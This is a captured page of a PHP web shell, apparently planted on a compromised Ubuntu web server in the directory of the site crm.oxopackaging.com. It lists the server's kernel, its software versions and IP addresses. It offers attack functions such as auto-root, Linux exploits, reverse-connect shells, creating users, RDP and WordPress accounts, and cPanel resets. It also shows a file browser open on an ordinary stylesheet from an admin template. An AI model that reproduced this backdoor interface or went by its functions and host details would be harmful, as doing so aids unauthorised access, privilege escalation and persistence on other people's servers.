Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.154.243
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
crm.oxopackaging.com /
resources /
sass /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap
[ DIR ]
drwxr-xr-x
bootstrap-extended
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
_variables.scss
138
B
-rw-r--r--
app.scss
158
B
-rw-r--r--
bootstrap-extended.scss
1.94
KB
-rw-r--r--
bootstrap.scss
352
B
-rw-r--r--
colors.scss
947
B
-rw-r--r--
components.scss
1.83
KB
-rw-r--r--
custom-laravel.scss
1.71
KB
-rw-r--r--
custom-rtl.scss
5.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom-laravel.scss
/*========================================================================================= File Name: laravel-menu.scss Description: laravel Specific menu styles ---------------------------------------------------------------------------------------- Item name: Vuexy - Vuejs, HTML & Laravel Admin Dashboard Template Author: PIXINVENT Author URL: http://www.themeforest.net/user/pixinvent ==========================================================================================*/ // Core variables and mixins @import "bootstrap/functions"; @import "bootstrap/mixins"; @import "bootstrap-extended/mixins"; // Core variables and mixins overrides @import "core/variables/variables"; @import "bootstrap/variables"; // Overrides user variable @import "core/variables/components-variables"; // Import first main menu mixin @import "core/mixins/main-menu-mixin"; // Vertical menu //========================= body.vertical-layout { &.vertical-menu-modern { .horizontal-menu-wrapper{ display: none; } } } // Horizontal Menu //========================= .horizontal-menu{ // Hide Vertical menu in Horizontal Layout in Laravel not in HTML >.main-menu{ display: none; } .fixed-top{ left: 0; } } // content style //========================= html body.navbar-static .app-content .header-navbar { background: transparent; box-shadow: none !important; } @include media-breakpoint-down(xs) { // Vertical Layout body.vertical-layout { &:not(.horizontal-layout){ &.navbar-floating{ .header-navbar{ margin-left: 1.2rem; margin-right: 1.2rem; } } } } }
Close